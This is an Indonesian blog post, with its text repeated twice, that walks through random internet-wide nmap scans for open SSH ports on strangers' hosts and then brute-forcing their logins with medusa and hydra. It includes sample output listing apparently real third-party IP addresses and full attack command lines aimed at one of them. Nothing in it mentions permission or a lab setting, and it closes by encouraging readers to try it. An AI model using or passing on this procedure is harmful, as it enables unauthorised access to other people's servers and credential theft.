Tools yang di butuhkan:
1.NMAP
2.TOOLS PASSWORD ATTACK, SEPERTI:MEDUSA/HYDRA
3.WORDLIST DAN PASSWORDLIST
Langkah-langkah adalah
1.buka NMAP,
ketik command pada nmap.
nmap -v -iR 1000 -Pn -p 22 --open
(tergantung dari port yang anda ingin scan)
setelah anda mendapat output seperti di bawah ini:
Nmap scan report for 93.170.76.243
Host is up (0.89s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for rough.flashyloris.com (5.231.1.168)
Host is up (1.0s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for bb42-61-150-84.singnet.com.sg (42.61.150.84)
Host is up (0.44s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 74.d9.85ae.static.theplanet.com (174.133.217.116)
Host is up (0.84s latency).
PORT STATE SERVICE
22/tcp open ssh
ini tandanya nmap sudah berhasil menemukan port yang up dah host yang aktif.
3.langkah selanjutnya adalah pilih salah satu port yang ingin di bruteforce untuk mendapatkan tipe dari SSH apakah DSA ataupun RSA key.
contoh syntax: ping -c 4 93.170.76.243
jika mendapat output seperti di bawah ini:
PING 93.170.76.243 (93.170.76.243) 56(84) bytes of data.
64 bytes from 93.170.76.243: icmp_seq=1 ttl=51 time=365 ms
64 bytes from 93.170.76.243: icmp_seq=2 ttl=51 time=650 ms
64 bytes from 93.170.76.243: icmp_seq=3 ttl=51 time=670 ms
64 bytes from 93.170.76.243: icmp_seq=4 ttl=51 time=677 ms
--- 93.170.76.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 365.593/590.750/677.146/130.376 ms
ini artinya host aktif dan bisa di brutforce menggunakan hydra/medusa.
4.lakukan intense scan dengan perintah pada NMAP
syntax: nmap -T4 -A -O -v 93.170.76.243
5.setelah mendapat jenis DSA dan RSA key dari proses di atas. lakukan langkah selanjutnya yaitu dengan bruteforce attack.
(anda harus mempersiapkan wordlist dan passwordlist terlebih dahulu)
6.lakukan bruteforce dengan memakai salah satu tools password attack pada backtrack. medusa atau hydra.
syntax untuk penggunaan medusa.
medusa -h 93.170.76.243 -n 22 -U /root/brute/user.txt -P /root/brute/pass.txt -M ssh
syntax untuk penggunaan hydra.
hydra 93.170.76.243 -L /root/brute/user.txt -P /root/brute/pass.txt -t 1 -e ns -f -v -o /root/hacking.txt
Selamat mencoba
1.NMAP
2.TOOLS PASSWORD ATTACK, SEPERTI:MEDUSA/HYDRA
3.WORDLIST DAN PASSWORDLIST
Langkah-langkah adalah
1.buka NMAP,
ketik command pada nmap.
nmap -v -iR 1000 -Pn -p 22 --open
(tergantung dari port yang anda ingin scan)
setelah anda mendapat output seperti di bawah ini:
Nmap scan report for 93.170.76.243
Host is up (0.89s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for rough.flashyloris.com (5.231.1.168)
Host is up (1.0s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for bb42-61-150-84.singnet.com.sg (42.61.150.84)
Host is up (0.44s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 74.d9.85ae.static.theplanet.com (174.133.217.116)
Host is up (0.84s latency).
PORT STATE SERVICE
22/tcp open ssh
ini tandanya nmap sudah berhasil menemukan port yang up dah host yang aktif.
3.langkah selanjutnya adalah pilih salah satu port yang ingin di bruteforce untuk mendapatkan tipe dari SSH apakah DSA ataupun RSA key.
contoh syntax: ping -c 4 93.170.76.243
jika mendapat output seperti di bawah ini:
PING 93.170.76.243 (93.170.76.243) 56(84) bytes of data.
64 bytes from 93.170.76.243: icmp_seq=1 ttl=51 time=365 ms
64 bytes from 93.170.76.243: icmp_seq=2 ttl=51 time=650 ms
64 bytes from 93.170.76.243: icmp_seq=3 ttl=51 time=670 ms
64 bytes from 93.170.76.243: icmp_seq=4 ttl=51 time=677 ms
--- 93.170.76.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 365.593/590.750/677.146/130.376 ms
ini artinya host aktif dan bisa di brutforce menggunakan hydra/medusa.
4.lakukan intense scan dengan perintah pada NMAP
syntax: nmap -T4 -A -O -v 93.170.76.243
5.setelah mendapat jenis DSA dan RSA key dari proses di atas. lakukan langkah selanjutnya yaitu dengan bruteforce attack.
(anda harus mempersiapkan wordlist dan passwordlist terlebih dahulu)
6.lakukan bruteforce dengan memakai salah satu tools password attack pada backtrack. medusa atau hydra.
syntax untuk penggunaan medusa.
medusa -h 93.170.76.243 -n 22 -U /root/brute/user.txt -P /root/brute/pass.txt -M ssh
syntax untuk penggunaan hydra.
hydra 93.170.76.243 -L /root/brute/user.txt -P /root/brute/pass.txt -t 1 -e ns -f -v -o /root/hacking.txt
Selamat mencoba
0 komentar:
Posting Komentar